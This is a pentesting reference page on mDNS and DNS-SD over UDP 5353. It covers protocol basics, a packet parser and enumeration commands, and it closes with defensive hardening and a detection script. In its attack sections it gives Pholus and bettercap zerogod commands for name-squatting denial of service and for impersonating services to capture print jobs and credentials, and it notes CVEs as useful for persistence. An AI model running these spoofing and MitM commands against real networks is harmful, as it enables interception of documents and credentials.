5353/UDP Multicast DNS (mDNS) and DNS-SD


Basic Information

Multicast DNS (mDNS) provides DNS-like name resolution and service discovery on the local link without a unicast DNS server. It uses UDP/5353 and the multicast addresses 224.0.0.251 (IPv4) and FF02::FB (IPv6). DNS Service Discovery (DNS-SD, usually used together with mDNS) provides a standardised way to enumerate and describe services through PTR, SRV and TXT records.

PORT     STATE SERVICE
5353/udp open  zeroconf

Key protocol details you’ll often leverage during attacks:

  • Names in the .local domain are resolved via mDNS.
  • The QU (Query Unicast) bit lets a querier request unicast replies even for multicast questions.
  • Implementations should ignore packets that do not originate on the local link; some stacks still accept them.
  • Probing/announcing ensures that host/service names are unique; interfering here creates DoS / “name squatting” conditions.

DNS-SD service model

Services are advertised as _<service>._tcp or _<service>._udp under .local, for example _ipp._tcp.local (printers), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge), etc. Discover the available types with _services._dns-sd._udp.local, then resolve the discovered instances down to SRV/TXT/A/AAAA.
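To make the record model concrete, here is an added example (not code from this page or from any tool it mentions) that parses a raw mDNS response, following name compression pointers and decoding the PTR, SRV and TXT RDATA that DNS-SD is built on. The sample packet is constructed inside the block; the printer name, hostname and address are made up.

```python
import struct
TYPES = {1: "A", 12: "PTR", 16: "TXT", 28: "AAAA", 33: "SRV"}

def read_name(buf, off):  # decode a DNS name, following 0xC0 compression pointers; returns (name, next_off)
    labels, end = [], None
    while True:
        n = buf[off]
        if n & 0xC0 == 0xC0:                      # pointer: remember where to resume, then jump
            end = off + 2 if end is None else end
            off = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if n == 0:
            break
        labels.append(buf[off:off + n].decode("ascii")); off += n
    return ".".join(labels), (off if end is None else end)
def parse_rdata(rtype, buf, off, rdlen):  # decode the RDATA of the record types DNS-SD relies on
    if rtype == 12:                               # PTR: service type -> instance name
        return read_name(buf, off)[0]
    if rtype == 33:                               # SRV: priority, weight, port, target host
        return {"port": struct.unpack("!HHH", buf[off:off + 6])[2], "target": read_name(buf, off + 6)[0]}
    if rtype == 16:                               # TXT: sequence of length-prefixed key=value strings
        items, end = [], off + rdlen
        while off < end:
            items.append(buf[off + 1:off + 1 + buf[off]].decode()); off += 1 + buf[off]
        return dict(i.split("=", 1) for i in items if "=" in i)
    return buf[off:off + rdlen].hex()             # A/AAAA and anything else: raw hex
def parse_mdns(buf):  # parse an mDNS message; returns every resource record (answer/authority/additional)
    _, flags, qd, an, ns, ar = struct.unpack("!6H", buf[:12])
    off, records = 12, []
    for _ in range(qd):                           # skip the question section (name + type + class)
        off = read_name(buf, off)[1] + 4
    for _ in range(an + ns + ar):
        name, off = read_name(buf, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10]); off += 10
        records.append({"name": name, "type": TYPES.get(rtype, rtype), "ttl": ttl,
                        "cache_flush": bool(rclass & 0x8000),   # mDNS "unique record" (cache-flush) bit
                        "data": parse_rdata(rtype, buf, off, rdlen)}); off += rdlen
    return records

# Constructed sample (not a real capture): a printer announcing _ipp._tcp with PTR, SRV, TXT and A records.
def enc_name(name):                               # encode an uncompressed name (labels must not contain dots)
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
def enc_rr(name, rtype, ttl, rdata, unique=False):  # one resource record; unique sets the cache-flush bit
    return enc_name(name) + struct.pack("!HHIH", rtype, 0x8001 if unique else 1, ttl, len(rdata)) + rdata
SAMPLE = (struct.pack("!6H", 0, 0x8400, 0, 4, 0, 0)            # header: response + authoritative, 4 answers
    + enc_rr("_ipp._tcp.local", 12, 4500, enc_name("Lobby Printer._ipp._tcp.local"))
    + enc_rr("Lobby Printer._ipp._tcp.local", 33, 120, struct.pack("!HHH", 0, 0, 631) + enc_name("printer.local"), True)
    + enc_rr("Lobby Printer._ipp._tcp.local", 16, 4500, b"\x09txtvers=1\x07rp=ipp/", True)
    + enc_rr("printer.local", 1, 120, bytes([192, 168, 1, 42]), True))
```

Feeding `parse_mdns` the payload of any UDP/5353 datagram from a capture gives the same dict list, so the cache-flush bit and the SRV target of each announcement can be inspected directly.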

Network Exploration and Enumeration

  • nmap target scan (direct mDNS on a host):
nmap -sU -p 5353 --script=dns-service-discovery <target>
  • nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):
sudo nmap --script=broadcast-dns-service-discovery
  • avahi-browse (Linux):
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
  • Apple dns-sd (macOS):
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
  • Packet capture with tshark:
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""

Tip: Some browsers/WebRTC use ephemeral mDNS hostnames to hide local IPs. If you see random-UUID.local candidates on the wire, resolve them via mDNS to pivot to the local IPs.

Attacks

mDNS name probing interference (DoS / name squatting)

During the probing phase a host checks that its name is unique. Answering with spoofed conflicts forces it to choose new names or fail. This can delay or prevent service registration and discovery.

Example with Pholus:

# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000

Service spoofing and impersonation (MitM)

Impersonate advertised DNS-SD services (printers, AirPlay, HTTP, file shares) to force clients to connect to you. This is especially useful for:

  • Capturing documents by spoofing _ipp._tcp or _printer._tcp.
  • Luring clients to HTTP/HTTPS services to harvest tokens/cookies or deliver payloads.
  • Combining with NTLM relay techniques when Windows clients negotiate auth against the spoofed services.

With the bettercap zerogod module (mDNS/DNS-SD spoofer/impersonator):

# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"

# Show all services seen from a host
> zerogod.show 192.168.1.42
# Show full DNS records for a host (newer bettercap)
> zerogod.show-full 192.168.1.42

# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42

# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42

# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml

See also the generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay workflows:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Notes on recent implementation issues (useful for DoS/persistence during an engagement)

  • Avahi reachable-assertion and D-Bus crash bugs (2023) can terminate avahi-daemon on Linux distributions (e.g. CVE-2023-38469..38473, CVE-2023-1981), disrupting service discovery on target machines until it is restarted.
  • Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (CVE-2024-20303) lets adjacent WLAN clients flood crafted mDNS, driving up WLC CPU usage and dropping AP tunnels; relevant if you need to force client roaming or controller resets during an engagement.
  • Apple mDNSResponder logic error DoS (CVE-2024-44183) lets a sandboxed local process crash Bonjour, briefly disabling service publication/lookup on Apple endpoints; patched in current iOS/macOS releases.
  • Apple mDNSResponder correctness issue (CVE-2025-31222) allowed local privilege escalation via mDNSResponder; useful for persistence on unmanaged Macs/iPhones, fixed in recent iOS/macOS updates.

Browser/WebRTC and mDNS considerations

Modern Chromium/Firefox hide host candidates behind random mDNS names. You can re-expose LAN IPs on endpoints you control by pushing the Chrome policy WebRtcLocalIpsAllowedUrls (or toggling chrome://flags/#enable-webrtc-hide-local-ips-with-mdns / the Edge equivalent) so that ICE shows host candidates instead of mDNS names; set it via HKLM\Software\Policies\Google\Chrome.

When users disable the protection by hand (commonly following WebRTC troubleshooting guides), their browsers start advertising plain host candidates again, which you can capture via mDNS or ICE signalling to speed up host discovery.

Defensive considerations and OPSEC

  • Segment boundaries: Do not route 224.0.0.251/FF02::FB between security zones unless an mDNS gateway is explicitly required. If you must bridge discovery, use allowlists and rate limits.
  • Windows endpoints/servers:
      • To completely disable name resolution via mDNS, set the registry value and reboot:
        HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
      • In managed environments, disable the built-in “mDNS (UDP-In)” Windows Defender Firewall rule (at least on the Domain profile) to block inbound mDNS processing while preserving home/roaming functionality.
      • On newer Windows 11 builds/GPO templates, use the policy “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” and set it to Disabled.
  • Linux (Avahi):
      • Lock down publishing when it is not needed: set disable-publishing=yes, and restrict interfaces with allow-interfaces= / deny-interfaces= in /etc/avahi/avahi-daemon.conf.
      • Consider check-response-ttl=yes and avoid enable-reflector=yes unless strictly required; prefer reflect-filters= allowlists when reflecting.
  • macOS: Block inbound mDNS on host/network firewalls where Bonjour discovery is not needed for specific subnets.
  • Monitoring: Alert on unexpected surges of _services._dns-sd._udp.local queries or sudden changes in the SRV/TXT records of important services; these are indicators of spoofing or service impersonation.
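An added example (not from this page or any tool it mentions) of the monitoring idea above: a small detector run over constructed mDNS events that flags a per-source burst of _services._dns-sd._udp.local enumeration queries, and any SRV/TXT record of a watched instance whose content or announcing host changes. The event format, thresholds, addresses and names are assumptions.

```python
from collections import defaultdict, deque

ENUM_QUERY = "_services._dns-sd._udp.local"
WINDOW_S, MAX_ENUM_QUERIES = 60, 5   # assumed thresholds: more than 5 type enumerations per source per minute

# Constructed sample events (not real traffic), as you might export them from a tshark capture:
# (kind, epoch_seconds, src_ip, name, rtype, rdata)
EVENTS = [
    ("answer", 1000, "192.168.1.42", "Lobby Printer._ipp._tcp.local", "SRV", "printer.local:631"),
    ("answer", 1000, "192.168.1.42", "Lobby Printer._ipp._tcp.local", "TXT", "txtvers=1 rp=ipp/"),
    ("query", 1010, "192.168.1.77", ENUM_QUERY, "PTR", ""),            # a single enumeration: normal
] + [("query", 1030 + 3 * i, "192.168.1.99", ENUM_QUERY, "PTR", "") for i in range(6)] + [
    ("answer", 1060, "192.168.1.42", "Lobby Printer._ipp._tcp.local", "TXT", "txtvers=1 rp=ipp/"),  # unchanged
    ("answer", 1100, "192.168.1.99", "Lobby Printer._ipp._tcp.local", "SRV", "printer-2.local:631"),
]

def detect(events, watched):
    """Return alerts for (a) bursts of service-type enumeration per source and
    (b) SRV/TXT records of watched instances whose data or announcing host changes."""
    alerts, queries, baseline = [], defaultdict(deque), {}
    for kind, t, src, name, rtype, data in sorted(events, key=lambda e: e[1]):
        if kind == "query" and name == ENUM_QUERY:
            q = queries[src]
            q.append(t)
            while t - q[0] > WINDOW_S:                 # slide the per-source window
                q.popleft()
            if len(q) == MAX_ENUM_QUERIES + 1:         # alert once, when the threshold is first crossed
                alerts.append(("enum-spike", src, t, len(q)))
        elif kind == "answer" and rtype in ("SRV", "TXT") and name in watched:
            prev = baseline.get((name, rtype))
            if prev is not None and prev != (src, data):   # same record, different content or sender
                alerts.append(("record-change", name, rtype, prev[0], src, data))
            baseline[(name, rtype)] = (src, data)
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS, {"Lobby Printer._ipp._tcp.local"}):
        print(*alert)
```

A re-announcement with identical SRV/TXT data from the same host is deliberately silent, so periodic refreshes by the legitimate service do not page anyone.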

Quick tool reference

  • nmap NSE: dns-service-discovery and broadcast-dns-service-discovery.
  • Pholus: active scanning, reverse mDNS sweeps, DoS and spoofing helpers.
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
  • bettercap zerogod: discover, save, advertise and impersonate mDNS/DNS-SD services (see the examples above).

Spoofing/MitM

The most interesting attack you can perform over this service is a MitM on the communication between a client and the real server. You may obtain sensitive files (MitM the communication with a printer) or even credentials (Windows authentication).
For more information see:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
